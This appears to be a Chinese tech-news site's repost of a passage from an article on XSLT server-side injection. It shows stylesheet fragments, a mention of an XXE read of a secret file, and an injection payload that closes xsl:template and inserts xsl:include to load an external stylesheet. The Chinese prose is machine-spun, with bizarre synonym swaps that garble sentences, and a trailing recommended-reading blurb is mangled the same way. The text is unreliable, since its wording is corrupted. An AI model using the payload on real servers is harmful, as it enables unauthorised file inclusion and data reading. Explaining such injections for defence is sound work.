作家
登录

解析XSLT服务器端注入攻击

作者: 来源: 2017-12-07 10:32:33 阅读 我要评论

/> 
  •     </xsl:for-each> 
  •   </xsl:template> 
  •   <xsl:include href="external_transform.xslt"/> 
  • </xsl:stylesheet> 
  • 我们须要include下面这个名为“external_transform.xslt”的外部XSLT文件:

    1. <?xml version=”1.0” encoding=”utf-8”?> 
    2. <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
    3.     <xsl:template match="/"> 
    4.                                                                                                                        Hello from the external transformation 
    5.     </xsl:template> 
    6. </xsl:stylesheet> 

    除了常见的XML进击之外,XXE进击同样可以影响XSLT。鄙人面的样本中,我们应用一个外部实体攫掏出了“C:\secretfruit.txt”文件的内容:

    为了include外部文档,我们须要注入下列标签:

    1. <xsl:include href="external_transform.xslt"/> 

    然则这里有一个问题,即“xsl:include”标签无法包含在一个“xsl:template”标签中,并且生成的文件必须是XML文档。

    是以,我们起首须要闭合“xsl:template”标签,然后添加“xsl:include”标签,最终的Payload如下:

    1. </xsl:template><xsl:include href="external_transform.xslt"/><xsl:template name="a"> 


      推荐阅读

      引入机器学习前需要先弄明白这三件事

    很多公司声称本身的解决筹划中囊括了ML,但大年夜多半时刻,这项功能是被夸大年夜了的。钠揭捉?问供给商的问题,应落脚在他们体系的精确率、速度和效力上。分析的数据是大年夜哪儿来的?收集频率是多久一次?该解决筹>>>详细阅读


    本文标题:解析XSLT服务器端注入攻击

    地址:http://www.17bianji.com/lsqh/39533.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)